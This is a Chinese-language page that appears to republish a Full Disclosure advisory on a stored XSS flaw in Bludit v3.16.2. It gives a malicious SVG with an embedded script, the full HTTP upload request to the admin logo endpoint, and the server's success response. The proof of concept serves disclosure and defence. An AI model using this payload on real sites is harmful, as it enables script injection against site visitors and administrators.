通过SVG文件上传导致的XSS漏洞 - Bludit v3.16.2

通过Full Disclosure邮件列表发送 https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/

1
2
3
4
5

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100" height="100" version="1.1" xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">alert('xss');</script>
</svg>

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

POST /bludit/admin/ajax/logo-upload HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
[...]

------geckoformboundarye27e3ffc54c763baa293ac2aeb3ed1a4
Content-Disposition: form-data; name="tokenCSRF"

59fc6f48ad5d60b39699491cada2390e1b42531b
------geckoformboundarye27e3ffc54c763baa293ac2aeb3ed1a4
Content-Disposition: form-data; name="inputFile"; filename="evilsvgfile-xss-bypass.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="100" height="100" version="1.1" xmlns="http://www.w3.org/2000/svg">
  <script type="text/javascript">alert('xss');</script>
</svg>
------geckoformboundarye27e3ffc54c763baa293ac2aeb3ed1a4--

1
2
3
4
5
6
7

HTTP/1.1 200 OK
Date: Sat, 28 Jun 2025 21:16:10 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
[...]

{"status":0,"message":"Image uploaded.","filename":"test.svg","absoluteURL":"http:\/\/192.168.58.133\/bludit\/bl-content\/uploads\/test.svg","absolutePath":"\/opt\/lampp\/htdocs\/bludit\/bl-content\/uploads\/test.svg"}

Bludit v3.16.2 SVG文件上传导致的XSS漏洞分析

本文详细分析了Bludit v3.16.2中通过SVG文件上传导致的跨站脚本(XSS)漏洞，包括漏洞复现步骤、恶意SVG代码示例以及HTTP请求和响应数据，帮助开发者和安全研究人员理解和防范此类安全风险。

通过SVG文件上传导致的XSS漏洞 - Bludit v3.16.2

XSS via SVG文件上传 #1

复现步骤

HTTP POST请求上传SVG文件

HTTP响应